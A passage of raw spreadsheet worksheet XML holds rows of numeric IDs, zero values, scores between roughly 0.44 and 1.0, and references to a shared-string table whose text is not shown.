        <v>1149</v>
      </c>
      <c r="C1764">
        <v>1149</v>
      </c>
      <c r="D1764">
        <v>0</v>
      </c>
      <c r="E1764">
        <v>0.99699997901916504</v>
      </c>
      <c r="F1764" t="s">
        <v>7</v>
      </c>
      <c r="G1764" t="s">
        <v>3483</v>
      </c>
      <c r="H1764" t="s">
        <v>3484</v>
      </c>
    </row>
    <row r="1765" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1765" s="1">
        <v>1763</v>
      </c>
      <c r="B1765">
        <v>458</v>
      </c>
      <c r="C1765">
        <v>458</v>
      </c>
      <c r="D1765">
        <v>0</v>
      </c>
      <c r="E1765">
        <v>0.99659997224807739</v>
      </c>
      <c r="F1765" t="s">
        <v>7</v>
      </c>
      <c r="G1765" t="s">
        <v>3485</v>
      </c>
      <c r="H1765" t="s">
        <v>3486</v>
      </c>
    </row>
    <row r="1766" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1766" s="1">
        <v>1764</v>
      </c>
      <c r="B1766">
        <v>1146</v>
      </c>
      <c r="C1766">
        <v>1146</v>
      </c>
      <c r="D1766">
        <v>0</v>
      </c>
      <c r="E1766">
        <v>0.8003000020980835</v>
      </c>
      <c r="F1766" t="s">
        <v>7</v>
      </c>
      <c r="G1766" t="s">
        <v>3487</v>
      </c>
      <c r="H1766" t="s">
        <v>3488</v>
      </c>
    </row>
    <row r="1767" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1767" s="1">
        <v>1765</v>
      </c>
      <c r="B1767">
        <v>5411</v>
      </c>
      <c r="C1767">
        <v>5411</v>
      </c>
      <c r="D1767">
        <v>0</v>
      </c>
      <c r="E1767">
        <v>0.99150002002716064</v>
      </c>
      <c r="F1767" t="s">
        <v>7</v>
      </c>
      <c r="G1767" t="s">
        <v>3489</v>
      </c>
      <c r="H1767" t="s">
        <v>3490</v>
      </c>
    </row>
    <row r="1768" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1768" s="1">
        <v>1766</v>
      </c>
      <c r="B1768">
        <v>459</v>
      </c>
      <c r="C1768">
        <v>459</v>
      </c>
      <c r="D1768">
        <v>0</v>
      </c>
      <c r="E1768">
        <v>0.99690002202987671</v>
      </c>
      <c r="F1768" t="s">
        <v>7</v>
      </c>
      <c r="G1768" t="s">
        <v>3491</v>
      </c>
      <c r="H1768" t="s">
        <v>3492</v>
      </c>
    </row>
    <row r="1769" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1769" s="1">
        <v>1767</v>
      </c>
      <c r="B1769">
        <v>1144</v>
      </c>
      <c r="C1769">
        <v>1144</v>
      </c>
      <c r="D1769">
        <v>0</v>
      </c>
      <c r="E1769">
        <v>0.71929997205734253</v>
      </c>
      <c r="F1769" t="s">
        <v>7</v>
      </c>
      <c r="G1769" t="s">
        <v>3493</v>
      </c>
      <c r="H1769" t="s">
        <v>3494</v>
      </c>
    </row>
    <row r="1770" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1770" s="1">
        <v>1768</v>
      </c>
      <c r="B1770">
        <v>460</v>
      </c>
      <c r="C1770">
        <v>460</v>
      </c>
      <c r="D1770">
        <v>0</v>
      </c>
      <c r="E1770">
        <v>0.95520001649856567</v>
      </c>
      <c r="F1770" t="s">
        <v>7</v>
      </c>
      <c r="G1770" t="s">
        <v>3495</v>
      </c>
      <c r="H1770" t="s">
        <v>3496</v>
      </c>
    </row>
    <row r="1771" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1771" s="1">
        <v>1769</v>
      </c>
      <c r="B1771">
        <v>5331</v>
      </c>
      <c r="C1771">
        <v>5331</v>
      </c>
      <c r="D1771">
        <v>0</v>
      </c>
      <c r="E1771">
        <v>0.86100000143051147</v>
      </c>
      <c r="F1771" t="s">
        <v>7</v>
      </c>
      <c r="G1771" t="s">
        <v>3497</v>
      </c>
      <c r="H1771" t="s">
        <v>3498</v>
      </c>
    </row>
    <row r="1772" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1772" s="1">
        <v>1770</v>
      </c>
      <c r="B1772">
        <v>7773</v>
      </c>
      <c r="C1772">
        <v>7773</v>
      </c>
      <c r="D1772">
        <v>0</v>
      </c>
      <c r="E1772">
        <v>0.44620001316070562</v>
      </c>
      <c r="F1772" t="s">
        <v>7</v>
      </c>
      <c r="G1772" t="s">
        <v>3499</v>
      </c>
      <c r="H1772" t="s">
        <v>3500</v>
      </c>
    </row>
    <row r="1773" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1773" s="1">
        <v>1771</v>
      </c>
      <c r="B1773">
        <v>4955</v>
      </c>
      <c r="C1773">
        <v>4955</v>
      </c>
      <c r="D1773">
        <v>0</v>
      </c>
      <c r="E1773">
        <v>0.59240001440048218</v>
      </c>
      <c r="F1773" t="s">
        <v>7</v>
      </c>
      <c r="G1773" t="s">
        <v>3501</v>
      </c>
      <c r="H1773" t="s">
        <v>3502</v>
      </c>
    </row>
    <row r="1774" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1774" s="1">
        <v>1772</v>
      </c>
      <c r="B1774">
        <v>5409</v>
      </c>
      <c r="C1774">
        <v>5409</v>
      </c>
      <c r="D1774">
        <v>0</v>
      </c>
      <c r="E1774">
        <v>0.99889999628067017</v>
      </c>
      <c r="F1774" t="s">
        <v>7</v>
      </c>
      <c r="G1774" t="s">
        <v>3503</v>
      </c>
      <c r="H1774" t="s">
        <v>3504</v>
      </c>
    </row>
    <row r="1775" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1775" s="1">
        <v>1773</v>
      </c>
      <c r="B1775">
        <v>59</v>
      </c>
      <c r="C1775">
        <v>59</v>
      </c>
      <c r="D1775">
        <v>0</v>
      </c>
      <c r="E1775">
        <v>0.70779997110366821</v>
      </c>
      <c r="F1775" t="s">
        <v>7</v>
      </c>
      <c r="G1775" t="s">
        <v>3505</v>
      </c>
      <c r="H1775" t="s">
        <v>3506</v>
      </c>
    </row>
    <row r="1776" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1776" s="1">
        <v>1774</v>
      </c>
      <c r="B1776">
        <v>7887</v>
      </c>
      <c r="C1776">
        <v>7887</v>
      </c>
      <c r="D1776">
        <v>0</v>
      </c>
      <c r="E1776">
        <v>0.99750000238418579</v>
      </c>
      <c r="F1776" t="s">
        <v>7</v>
      </c>
      <c r="G1776" t="s">
        <v>3507</v>
      </c>
      <c r="H1776" t="s">
        <v>3508</v>
      </c>
    </row>
    <row r="1777" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1777" s="1">
        <v>1775</v>
      </c>
      <c r="B1777">
        <v>341</v>
      </c>
      <c r="C1777">
        <v>341</v>
      </c>
      <c r="D1777">
        <v>0</v>
      </c>
      <c r="E1777">
        <v>0.99659997224807739</v>
      </c>
      <c r="F1777" t="s">
        <v>7</v>
      </c>
      <c r="G1777" t="s">
        <v>3509</v>
      </c>
      <c r="H1777" t="s">
        <v>3510</v>
      </c>
    </row>
    <row r="1778" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1778" s="1">
        <v>1776</v>
      </c>
      <c r="B1778">
        <v>5835</v>
      </c>
      <c r="C1778">
        <v>5835</v>
      </c>
      <c r="D1778">
        <v>0</v>
      </c>
      <c r="E1778">
        <v>0.79839998483657837</v>
      </c>
      <c r="F1778" t="s">
        <v>7</v>
      </c>
      <c r="G1778" t="s">
        <v>3511</v>
      </c>
      <c r="H1778" t="s">
        <v>3512</v>
      </c>
    </row>
    <row r="1779" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1779" s="1">
        <v>1777</v>
      </c>
      <c r="B1779">
        <v>4932</v>
      </c>
      <c r="C1779">
        <v>4932</v>
      </c>
      <c r="D1779">
        <v>0</v>
      </c>
      <c r="E1779">
        <v>0.99140000343322754</v>
      </c>
      <c r="F1779" t="s">
        <v>7</v>
      </c>
      <c r="G1779" t="s">
        <v>3513</v>
      </c>
      <c r="H1779" t="s">
        <v>3514</v>
      </c>
    </row>
    <row r="1780" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1780" s="1">
        <v>1778</v>
      </c>
      <c r="B1780">
        <v>5335</v>
      </c>
      <c r="C1780">
        <v>5335</v>
      </c>
      <c r="D1780">
        <v>0</v>
      </c>
      <c r="E1780">
        <v>0.66809999942779541</v>
      </c>
      <c r="F1780" t="s">
        <v>7</v>
      </c>
      <c r="G1780" t="s">
        <v>3515</v>
      </c>
      <c r="H1780" t="s">
        <v>3516</v>
      </c>
    </row>
    <row r="1781" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1781" s="1">
        <v>1779</v>
      </c>
      <c r="B1781">
        <v>1180</v>
      </c>
      <c r="C1781">
        <v>1180</v>
      </c>
      <c r="D1781">
        <v>0</v>
      </c>
      <c r="E1781">
        <v>0.99400001764297485</v>
      </c>
      <c r="F1781" t="s">
        <v>7</v>
      </c>
      <c r="G1781" t="s">
        <v>3517</v>
      </c>
      <c r="H1781" t="s">
        <v>3518</v>
      </c>
    </row>
    <row r="1782" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1782" s="1">
        <v>1780</v>
      </c>
      <c r="B1782">
        <v>1178</v>
      </c>
      <c r="C1782">
        <v>1178</v>
      </c>
      <c r="D1782">
        <v>0</v>
      </c>
      <c r="E1782">
        <v>0.66100001335144043</v>
      </c>
      <c r="F1782" t="s">
        <v>7</v>
      </c>
      <c r="G1782" t="s">
        <v>3519</v>
      </c>
      <c r="H1782" t="s">
        <v>3520</v>
      </c>
    </row>
    <row r="1783" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1783" s="1">
        <v>1781</v>
      </c>
      <c r="B1783">
        <v>5545</v>
      </c>
      <c r="C1783">
        <v>5545</v>
      </c>
      <c r="D1783">
        <v>0</v>
      </c>
      <c r="E1783">
        <v>0.99390000104904175</v>
      </c>
      <c r="F1783" t="s">
        <v>7</v>
      </c>
      <c r="G1783" t="s">
        <v>3521</v>
      </c>
      <c r="H1783" t="s">
        <v>3522</v>
      </c>
    </row>
    <row r="1784" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1784" s="1">
        <v>1782</v>
      </c>
      <c r="B1784">
        <v>345</v>
      </c>
      <c r="C1784">
        <v>345</v>
      </c>
      <c r="D1784">
        <v>0</v>
      </c>
      <c r="E1784">
        <v>0.92019999027252197</v>
      </c>
      <c r="F1784" t="s">
        <v>7</v>
      </c>
      <c r="G1784" t="s">
        <v>3523</v>
      </c>
      <c r="H1784" t="s">
        <v>3524</v>
      </c>
    </row>
    <row r="1785" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1785" s="1">
        <v>1783</v>
      </c>
      <c r="B1785">
        <v>5333</v>
      </c>
      <c r="C1785">
        <v>5333</v>
      </c>
      <c r="D1785">
        <v>0</v>
      </c>
      <c r="E1785">
        <v>0.92890000343322754</v>
      </c>
      <c r="F1785" t="s">
        <v>7</v>
      </c>
      <c r="G1785" t="s">
        <v>3525</v>
      </c>
      <c r="H1785" t="s">
        <v>3526</v>
      </c>
    </row>
    <row r="1786" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1786" s="1">
        <v>1784</v>
      </c>
      <c r="B1786">
        <v>1175</v>
      </c>
      <c r="C1786">
        <v>1175</v>
      </c>
      <c r="D1786">
        <v>0</v>
      </c>
      <c r="E1786">
        <v>0.57660001516342163</v>
      </c>
      <c r="F1786" t="s">
        <v>7</v>
      </c>
      <c r="G1786" t="s">
        <v>3527</v>
      </c>
      <c r="H1786" t="s">
        <v>3528</v>
      </c>
    </row>
    <row r="1787" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1787" s="1">
        <v>1785</v>
      </c>
      <c r="B1787">
        <v>1174</v>
      </c>
      <c r="C1787">
        <v>1174</v>
      </c>
      <c r="D1787">
        <v>0</v>
      </c>
      <c r="E1787">
        <v>0.85130000114440918</v>
      </c>
      <c r="F1787" t="s">
        <v>7</v>
      </c>
      <c r="G1787" t="s">
        <v>3529</v>
      </c>
      <c r="H1787" t="s">
        <v>3530</v>
      </c>
    </row>
    <row r="1788" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1788" s="1">
        <v>1786</v>
      </c>
      <c r="B1788">
        <v>1173</v>
      </c>
      <c r="C1788">
        <v>1173</v>
      </c>
      <c r="D1788">
        <v>0</v>
      </c>
      <c r="E1788">
        <v>0.99959999322891235</v>
      </c>
      <c r="F1788" t="s">
        <v>7</v>
      </c>
      <c r="G1788" t="s">
        <v>3531</v>
      </c>
      <c r="H1788" t="s">
        <v>3532</v>
      </c>
    </row>
    <row r="1789" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1789" s="1">
        <v>1787</v>
      </c>
      <c r="B1789">
        <v>4937</v>
      </c>
      <c r="C1789">
        <v>4937</v>
      </c>
      <c r="D1789">
        <v>0</v>
      </c>
      <c r="E1789">
        <v>0.79119998216629028</v>
      </c>
      <c r="F1789" t="s">
        <v>7</v>
      </c>
      <c r="G1789" t="s">
        <v>3533</v>
      </c>
      <c r="H1789" t="s">
        <v>3534</v>
      </c>
    </row>
    <row r="1790" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1790" s="1">
        <v>1788</v>
      </c>
      <c r="B1790">
        <v>1171</v>
      </c>
      <c r="C1790">
        <v>1171</v>
      </c>
      <c r="D1790">
        <v>0</v>
      </c>
      <c r="E1790">
        <v>0.73669999837875366</v>
      </c>
      <c r="F1790" t="s">
        <v>7</v>
      </c>
      <c r="G1790" t="s">
        <v>3535</v>
      </c>
      <c r="H1790" t="s">
        <v>3536</v>
      </c>
    </row>
    <row r="1791" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1791" s="1">
        <v>1789</v>
      </c>
      <c r="B1791">
        <v>4938</v>
      </c>
      <c r="C1791">
        <v>4938</v>
      </c>
      <c r="D1791">
        <v>0</v>
      </c>
      <c r="E1791">
        <v>0.99010002613067627</v>
      </c>
      <c r="F1791" t="s">
        <v>7</v>
      </c>
      <c r="G1791" t="s">
        <v>3537</v>
      </c>
      <c r="H1791" t="s">
        <v>3538</v>
      </c>
    </row>
    <row r="1792" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1792" s="1">
        <v>1790</v>
      </c>
      <c r="B1792">
        <v>1169</v>
      </c>
      <c r="C1792">
        <v>1169</v>
      </c>
      <c r="D1792">
        <v>0</v>
      </c>
      <c r="E1792">
        <v>0.99299997091293335</v>
      </c>
      <c r="F1792" t="s">
        <v>7</v>
      </c>
      <c r="G1792" t="s">
        <v>3539</v>
      </c>
      <c r="H1792" t="s">
        <v>3540</v>
      </c>
    </row>
    <row r="1793" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1793" s="1">
        <v>1791</v>
      </c>
      <c r="B1793">
        <v>4939</v>
      </c>
      <c r="C1793">
        <v>4939</v>
      </c>
      <c r="D1793">
        <v>0</v>
      </c>
      <c r="E1793">
        <v>0.78240001201629639</v>
      </c>
      <c r="F1793" t="s">
        <v>7</v>
      </c>
      <c r="G1793" t="s">
        <v>3541</v>
      </c>
      <c r="H1793" t="s">
        <v>3542</v>
      </c>
    </row>
    <row r="1794" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1794" s="1">
        <v>1792</v>
      </c>
      <c r="B1794">
        <v>55</v>
      </c>
      <c r="C1794">
        <v>55</v>
      </c>
      <c r="D1794">
        <v>0</v>
      </c>
      <c r="E1794">
        <v>0.83600002527236938</v>
      </c>
      <c r="F1794" t="s">
        <v>7</v>
      </c>
      <c r="G1794" t="s">
        <v>3543</v>
      </c>
      <c r="H1794" t="s">
        <v>3544</v>
      </c>
    </row>
    <row r="1795" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1795" s="1">
        <v>1793</v>
      </c>
      <c r="B1795">
        <v>7389</v>
      </c>
      <c r="C1795">
        <v>7389</v>
      </c>
      <c r="D1795">
        <v>0</v>
      </c>
      <c r="E1795">
        <v>0.74409997463226318</v>
      </c>
      <c r="F1795" t="s">
        <v>7</v>
      </c>
      <c r="G1795" t="s">
        <v>3545</v>
      </c>
      <c r="H1795" t="s">
        <v>3546</v>
      </c>
    </row>
    <row r="1796" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1796" s="1">
        <v>1794</v>
      </c>
      <c r="B1796">
        <v>56</v>
      </c>
      <c r="C1796">
        <v>56</v>
      </c>
      <c r="D1796">
        <v>0</v>
      </c>
      <c r="E1796">
        <v>0.46369999647140497</v>
      </c>
      <c r="F1796" t="s">
        <v>7</v>
      </c>
      <c r="G1796" t="s">
        <v>3547</v>
      </c>
      <c r="H1796" t="s">
        <v>3548</v>
      </c>
    </row>
    <row r="1797" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1797" s="1">
        <v>1795</v>
      </c>
      <c r="B1797">
        <v>4942</v>
      </c>
      <c r="C1797">
        <v>4942</v>
      </c>
      <c r="D1797">
        <v>0</v>
      </c>
      <c r="E1797">
        <v>0.99839997291564941</v>
      </c>
      <c r="F1797" t="s">
        <v>7</v>
      </c>
      <c r="G1797" t="s">
        <v>3549</v>
      </c>
      <c r="H1797" t="s">
        <v>3550</v>
      </c>
    </row>
    <row r="1798" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1798" s="1">
        <v>1796</v>
      </c>
      <c r="B1798">
        <v>342</v>
      </c>
      <c r="C1798">
        <v>342</v>
      </c>
      <c r="D1798">
        <v>0</v>
      </c>
      <c r="E1798">
        <v>0.61659997701644897</v>
      </c>
      <c r="F1798" t="s">
        <v>7</v>
      </c>
      <c r="G1798" t="s">
        <v>3551</v>
      </c>
      <c r="H1798" t="s">
        <v>3552</v>
      </c>
    </row>
    <row r="1799" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1799" s="1">
        <v>1797</v>
      </c>
      <c r="B1799">
        <v>4911</v>
      </c>
      <c r="C1799">
        <v>4911</v>
      </c>
      <c r="D1799">
        <v>0</v>
      </c>
      <c r="E1799">
        <v>0.98879998922348022</v>
      </c>
      <c r="F1799" t="s">
        <v>7</v>
      </c>
      <c r="G1799" t="s">
        <v>3553</v>
      </c>
      <c r="H1799" t="s">
        <v>3554</v>
      </c>
    </row>
    <row r="1800" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1800" s="1">
        <v>1798</v>
      </c>
      <c r="B1800">
        <v>4956</v>
      </c>
      <c r="C1800">
        <v>4956</v>
      </c>
      <c r="D1800">
        <v>0</v>
      </c>
      <c r="E1800">
        <v>0.70980000495910645</v>
      </c>
      <c r="F1800" t="s">
        <v>7</v>
      </c>
      <c r="G1800" t="s">
        <v>3555</v>
      </c>
      <c r="H1800" t="s">
        <v>3556</v>
      </c>
    </row>
    <row r="1801" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1801" s="1">
        <v>1799</v>
      </c>
      <c r="B1801">
        <v>7757</v>
      </c>
      <c r="C1801">
        <v>7757</v>
      </c>
      <c r="D1801">
        <v>0</v>
      </c>
      <c r="E1801">
        <v>0.45870000123977661</v>
      </c>
      <c r="F1801" t="s">
        <v>7</v>
      </c>
      <c r="G1801" t="s">
        <v>3557</v>
      </c>
      <c r="H1801" t="s">
        <v>3558</v>
      </c>
    </row>
    <row r="1802" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1802" s="1">
        <v>1800</v>
      </c>
      <c r="B1802">
        <v>418</v>
      </c>
      <c r="C1802">
        <v>418</v>
      </c>
      <c r="D1802">
        <v>0</v>
      </c>
      <c r="E1802">
        <v>0.85339999198913574</v>
      </c>
      <c r="F1802" t="s">
        <v>7</v>
      </c>
      <c r="G1802" t="s">
        <v>3559</v>
      </c>
      <c r="H1802" t="s">
        <v>3560</v>
      </c>
    </row>
    <row r="1803" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1803" s="1">
        <v>1801</v>
      </c>
      <c r="B1803">
        <v>1272</v>
      </c>
      <c r="C1803">
        <v>1272</v>
      </c>
      <c r="D1803">
        <v>0</v>
      </c>
      <c r="E1803">
        <v>0.66909998655319214</v>
      </c>
      <c r="F1803" t="s">
        <v>7</v>
      </c>
      <c r="G1803" t="s">
        <v>3561</v>
      </c>
      <c r="H1803" t="s">
        <v>3562</v>
      </c>
    </row>
    <row r="1804" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1804" s="1">
        <v>1802</v>
      </c>
      <c r="B1804">
        <v>1271</v>
      </c>
      <c r="C1804">
        <v>1271</v>
      </c>
      <c r="D1804">
        <v>0</v>
      </c>
      <c r="E1804">
        <v>0.88139998912811279</v>
      </c>
      <c r="F1804" t="s">
        <v>7</v>
      </c>
      <c r="G1804" t="s">
        <v>3563</v>
      </c>
      <c r="H1804" t="s">
        <v>3564</v>
      </c>
    </row>
    <row r="1805" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1805" s="1">
        <v>1803</v>
      </c>
      <c r="B1805">
        <v>387</v>
      </c>
      <c r="C1805">
        <v>387</v>
      </c>
      <c r="D1805">
        <v>0</v>
      </c>
      <c r="E1805">
        <v>0.96740001440048218</v>
      </c>
      <c r="F1805" t="s">
        <v>7</v>
      </c>
      <c r="G1805" t="s">
        <v>3565</v>
      </c>
      <c r="H1805" t="s">
        <v>3566</v>
      </c>
    </row>
    <row r="1806" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1806" s="1">
        <v>1804</v>
      </c>
      <c r="B1806">
        <v>10</v>
      </c>
      <c r="C1806">
        <v>10</v>
      </c>
      <c r="D1806">
        <v>0</v>
      </c>
      <c r="E1806">
        <v>0.51179999113082886</v>
      </c>
      <c r="F1806" t="s">
        <v>7</v>
      </c>
      <c r="G1806" t="s">
        <v>3567</v>
      </c>
      <c r="H1806" t="s">
        <v>3568</v>
      </c>
    </row>
    <row r="1807" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1807" s="1">
        <v>1805</v>
      </c>
      <c r="B1807">
        <v>389</v>
      </c>
      <c r="C1807">
        <v>389</v>
      </c>
      <c r="D1807">
        <v>0</v>
      </c>
      <c r="E1807">
        <v>0.82510000467300415</v>
      </c>
      <c r="F1807" t="s">
        <v>7</v>
      </c>
      <c r="G1807" t="s">
        <v>3569</v>
      </c>
      <c r="H1807" t="s">
        <v>3570</v>
      </c>
    </row>
    <row r="1808" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1808" s="1">
        <v>1806</v>
      </c>
      <c r="B1808">
        <v>7337</v>
      </c>
      <c r="C1808">
        <v>7337</v>
      </c>
      <c r="D1808">
        <v>0</v>
      </c>
      <c r="E1808">
        <v>0.55150002241134644</v>
      </c>
      <c r="F1808" t="s">
        <v>7</v>
      </c>
      <c r="G1808" t="s">
        <v>3571</v>
      </c>
      <c r="H1808" t="s">
        <v>3572</v>
      </c>
    </row>
    <row r="1809" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1809" s="1">
        <v>1807</v>
      </c>
      <c r="B1809">
        <v>5568</v>
      </c>
      <c r="C1809">
        <v>5568</v>
      </c>
      <c r="D1809">
        <v>0</v>
      </c>
      <c r="E1809">
        <v>0.99949997663497925</v>
      </c>
      <c r="F1809" t="s">
        <v>7</v>
      </c>
      <c r="G1809" t="s">
        <v>3573</v>
      </c>
      <c r="H1809" t="s">
        <v>3574</v>
      </c>
    </row>
    <row r="1810" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1810" s="1">
        <v>1808</v>
      </c>
      <c r="B1810">
        <v>7339</v>
      </c>
      <c r="C1810">
        <v>7339</v>
      </c>
      <c r="D1810">
        <v>0</v>
      </c>
      <c r="E1810">
        <v>0.59490001201629639</v>
      </c>
      <c r="F1810" t="s">
        <v>7</v>
      </c>
      <c r="G1810" t="s">
        <v>3575</v>
      </c>
      <c r="H1810" t="s">
        <v>3576</v>
      </c>
    </row>
    <row r="1811" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1811" s="1">
        <v>1809</v>
      </c>
      <c r="B1811">
        <v>7922</v>
      </c>
      <c r="C1811">
        <v>7922</v>
      </c>
      <c r="D1811">
        <v>0</v>
      </c>
      <c r="E1811">
        <v>0.70069998502731323</v>
      </c>
      <c r="F1811" t="s">
        <v>7</v>
      </c>
      <c r="G1811" t="s">
        <v>3577</v>
      </c>
      <c r="H1811" t="s">
        <v>3578</v>
      </c>
    </row>
    <row r="1812" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1812" s="1">
        <v>1810</v>
      </c>
      <c r="B1812">
        <v>5666</v>
      </c>
      <c r="C1812">
        <v>5666</v>
      </c>
      <c r="D1812">
        <v>0</v>
      </c>
      <c r="E1812">
        <v>0.44650000333786011</v>
      </c>
      <c r="F1812" t="s">
        <v>7</v>
      </c>
      <c r="G1812" t="s">
        <v>3579</v>
      </c>
      <c r="H1812" t="s">
        <v>3580</v>
      </c>
    </row>
    <row r="1813" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1813" s="1">
        <v>1811</v>
      </c>
      <c r="B1813">
        <v>5378</v>
      </c>
      <c r="C1813">
        <v>5378</v>
      </c>
      <c r="D1813">
        <v>0</v>
      </c>
      <c r="E1813">
        <v>0.58340001106262207</v>
      </c>
      <c r="F1813" t="s">
        <v>7</v>
      </c>
      <c r="G1813" t="s">
        <v>3581</v>
      </c>
      <c r="H1813" t="s">
        <v>3582</v>
      </c>
    </row>
    <row r="1814" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1814" s="1">
        <v>1812</v>
      </c>
      <c r="B1814">
        <v>5376</v>
      </c>
      <c r="C1814">
        <v>5376</v>
      </c>
      <c r="D1814">
        <v>0</v>
      </c>
      <c r="E1814">
        <v>0.99690002202987671</v>
      </c>
      <c r="F1814" t="s">
        <v>7</v>
      </c>
      <c r="G1814" t="s">
        <v>3583</v>
      </c>
      <c r="H1814" t="s">
        <v>3584</v>
      </c>
    </row>
    <row r="1815" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1815" s="1">
        <v>1813</v>
      </c>
      <c r="B1815">
        <v>5567</v>
      </c>
      <c r="C1815">
        <v>5567</v>
      </c>
      <c r="D1815">
        <v>0</v>
      </c>
      <c r="E1815">
        <v>0.94179999828338623</v>
      </c>
      <c r="F1815" t="s">
        <v>7</v>
      </c>
      <c r="G1815" t="s">
        <v>3585</v>
      </c>
      <c r="H1815" t="s">
        <v>3586</v>
      </c>
    </row>
    <row r="1816" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1816" s="1">
        <v>1814</v>
      </c>
      <c r="B1816">
        <v>5861</v>
      </c>
      <c r="C1816">
        <v>5861</v>
      </c>
      <c r="D1816">
        <v>0</v>
      </c>
      <c r="E1816">
        <v>0.8245999813079834</v>
      </c>
      <c r="F1816" t="s">
        <v>7</v>
      </c>
      <c r="G1816" t="s">
        <v>3587</v>
      </c>
      <c r="H1816" t="s">
        <v>3588</v>
      </c>
    </row>
    <row r="1817" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1817" s="1">
        <v>1815</v>
      </c>
      <c r="B1817">
        <v>5391</v>
      </c>
      <c r="C1817">
        <v>5391</v>
      </c>
      <c r="D1817">
        <v>0</v>
      </c>
      <c r="E1817">
        <v>0.98940002918243408</v>
      </c>
      <c r="F1817" t="s">
        <v>7</v>
      </c>
      <c r="G1817" t="s">
        <v>3589</v>
      </c>
      <c r="H1817" t="s">
        <v>3590</v>
      </c>
    </row>
    <row r="1818" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1818" s="1">
        <v>1816</v>
      </c>
      <c r="B1818">
        <v>397</v>
      </c>
      <c r="C1818">
        <v>397</v>
      </c>
      <c r="D1818">
        <v>0</v>
      </c>
      <c r="E1818">
        <v>0.91909998655319214</v>
      </c>
      <c r="F1818" t="s">
        <v>7</v>
      </c>
      <c r="G1818" t="s">
        <v>3591</v>
      </c>
      <c r="H1818" t="s">
        <v>3592</v>
      </c>
    </row>
    <row r="1819" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1819" s="1">
        <v>1817</v>
      </c>
      <c r="B1819">
        <v>14</v>
      </c>
      <c r="C1819">
        <v>14</v>
      </c>
      <c r="D1819">
        <v>0</v>
      </c>
      <c r="E1819">
        <v>0.99459999799728394</v>
      </c>
      <c r="F1819" t="s">
        <v>7</v>
      </c>
      <c r="G1819" t="s">
        <v>3593</v>
      </c>
      <c r="H1819" t="s">
        <v>3594</v>
      </c>
    </row>
    <row r="1820" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1820" s="1">
        <v>1818</v>
      </c>
      <c r="B1820">
        <v>370</v>
      </c>
      <c r="C1820">
        <v>370</v>
      </c>
      <c r="D1820">
        <v>0</v>
      </c>
      <c r="E1820">
        <v>0.98720002174377441</v>
      </c>
      <c r="F1820" t="s">
        <v>7</v>
      </c>
      <c r="G1820" t="s">
        <v>3595</v>
      </c>
      <c r="H1820" t="s">
        <v>3596</v>
      </c>
    </row>
    <row r="1821" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1821" s="1">
        <v>1819</v>
      </c>
      <c r="B1821">
        <v>7920</v>
      </c>
      <c r="C1821">
        <v>7920</v>
      </c>
      <c r="D1821">
        <v>0</v>
      </c>
      <c r="E1821">
        <v>0.62080001831054688</v>
      </c>
      <c r="F1821" t="s">
        <v>7</v>
      </c>
      <c r="G1821" t="s">
        <v>3597</v>
      </c>
      <c r="H1821" t="s">
        <v>3598</v>
      </c>
    </row>
    <row r="1822" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1822" s="1">
        <v>1820</v>
      </c>
      <c r="B1822">
        <v>7754</v>
      </c>
      <c r="C1822">
        <v>7754</v>
      </c>
      <c r="D1822">
        <v>0</v>
      </c>
      <c r="E1822">
        <v>0.99510002136230469</v>
      </c>
      <c r="F1822" t="s">
        <v>7</v>
      </c>
      <c r="G1822" t="s">
        <v>3599</v>
      </c>
      <c r="H1822" t="s">
        <v>3600</v>
      </c>
